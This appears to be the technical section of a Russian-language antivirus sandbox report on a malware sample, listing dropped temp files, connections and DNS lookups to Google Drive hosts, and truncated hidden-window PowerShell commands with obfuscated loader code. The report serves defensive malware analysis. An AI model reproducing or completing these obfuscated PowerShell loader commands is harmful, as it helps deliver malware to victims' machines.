Техническая информация
- %TEMP%\speljvendt192.txt
- %WINDIR%\temp\cabd3c3.tmp
- %WINDIR%\temp\tard3c4.tmp
- %WINDIR%\temp\cabd50d.tmp
- %WINDIR%\temp\tard50e.tmp
- %WINDIR%\temp\cabd3c3.tmp
- %WINDIR%\temp\tard3c4.tmp
- %WINDIR%\temp\cabd50d.tmp
- %WINDIR%\temp\tard50e.tmp
- 'drive.google.com':443
- 'pk#.goog':80
- 'drive.usercontent.google.com':443
- http://pk#.goog/gsr1/gsr1.crt
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
- DNS ASK drive.google.com
- DNS ASK pk#.goog
- DNS ASK drive.usercontent.google.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Quicksort Foejelighed Unmalled Firecifredes Stnkpropper Gummous #>;$Klapsets=(cmd /c set /A 115^^0);Function Temperaturmaalingernes ([String]$Markswomen){$Himmerland=8;$Lukningerne=Kontorlan...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Quicksort Foejelighed Unmalled Firecifredes Stnkpropper Gummous #>;$Klapsets=(cmd /c set /A 115^^0);Function Temperaturmaalingernes ([String]$Markswomen){$Himmerland=8;$Lukningerne=Kontorlan...
- '<SYSTEM32>\cmd.exe' /c set /A 115^^0